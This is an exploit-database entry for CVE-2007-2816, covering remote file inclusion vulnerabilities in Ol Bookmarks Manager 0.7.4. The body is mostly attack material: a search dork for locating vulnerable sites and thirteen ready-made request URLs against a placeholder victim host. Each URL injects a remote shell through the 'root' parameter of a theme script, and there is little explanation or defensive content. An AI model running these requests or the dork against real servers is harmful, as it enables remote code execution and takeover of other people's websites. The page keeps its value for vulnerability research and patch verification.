Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities



EDB-ID: 3962 CVE: 2007-2816 OSVDB-ID: 36493
Author: ThE TiGeR Published: 2007-05-21 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
#Olbookmarks =>0.7.4 multiple RFI (root)

Download script :

#D0rk : allintitle:ol'bookmarks

#Thanks Str0ke

#Exploit : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz

#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell

#http://victime.com/path/themes/blackorange.php?root=shell

#http://victime.com/path/theme/default.php?root=shell

#http://victime.com/path/theme/frames1.php?root=shell

#http://victime.com/path/theme/frames1_top.php?root=shell

#http://victime.com/path/theme/test1.php?root=shell

#http://victime.com/path/theme/test2.php?root=shell

#http://victime.com/path/theme/test3.php?root=shell

#http://victime.com/path/theme/test4.php?root=shell

#http://victime.com/path/theme/test5.php?root=shell

#http://victime.com/path/theme/test6.php?root=shell

#http://victime.com/path/theme/frames1_left.php?root=shell

#http://victime.com/path/theme/frames1_center.php?root=shell

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-21]






Comments

No comments so far